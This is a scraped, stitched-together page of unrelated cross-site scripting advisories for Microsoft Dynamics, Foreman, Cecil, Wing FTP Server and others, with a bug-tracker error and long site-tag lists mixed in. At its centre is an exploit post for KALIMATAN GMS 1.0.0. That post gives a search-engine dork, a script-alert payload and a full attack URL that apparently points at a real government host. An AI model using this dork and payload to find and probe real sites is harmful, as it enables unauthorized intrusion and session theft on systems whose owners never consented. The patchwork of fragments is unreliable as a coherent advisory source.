Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

CVE-2023-38164

Dynamics Finance and Operations Cross-site Scripting Vulnerability

CVE-2023-36800

A stored Cross-site scripting vulnerability was found in foreman. The Comment section in the Hosts tab has incorrect filtering of user input data. As a result of the attack, an attacker with an existing account on the system can steal another user's session, make requests on behalf of the user, and obtain user credentials.

'2159104?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-0119: Invalid Bug ID

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

Posted Sep 12, 2023

Authored by indoushka

KALIMATAN GMS version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | bd48e4a98638b72cd97b9bc442df28c3737e9b1208d03e5a4a7f58660e0bf243

Download | Favorite | View

**KALIMATAN GMS 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : KALIMATAN GMS V1.0.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  | # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : <script>alert(/indoushka/);</script>[+] http://Targetteppa.kaltimprovgoid/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,177)
*   Arbitrary (16,247)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,301)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,519)
*   Encryption (2,371)
*   Exploit (52,086)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,704)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,852)
*   Root (3,590)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,895)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,409)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,825)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,994)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,833)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,676)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,841)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,896)
*   UNIX (9,306)
*   UnixWare (186)
*   Windows (6,584)
*   Other

KALIMATAN GMS 1.0.0 Cross Site Scripting

Cross-site Scripting (XSS) - Reflected in GitHub repository cecilapp/cecil prior to 7.47.1.

**Cecil Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Sep 12, 2023 to the GitHub Advisory Database • Updated Sep 14, 2023

GHSA-p9q8-7x22-5x77: Cecil Cross-site Scripting vulnerability

CVE-2023-4913

Improper encoding or escaping of output in Wing FTP Server (User Web Client) allows Cross-Site Scripting (XSS).This issue affects Wing FTP Server: <= 7.2.0.



CVE-2023-37875: Wing FTP Server History

**According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?**

The user would have to click on a specially crafted URL to be compromised by the attacker.

Tag

#xss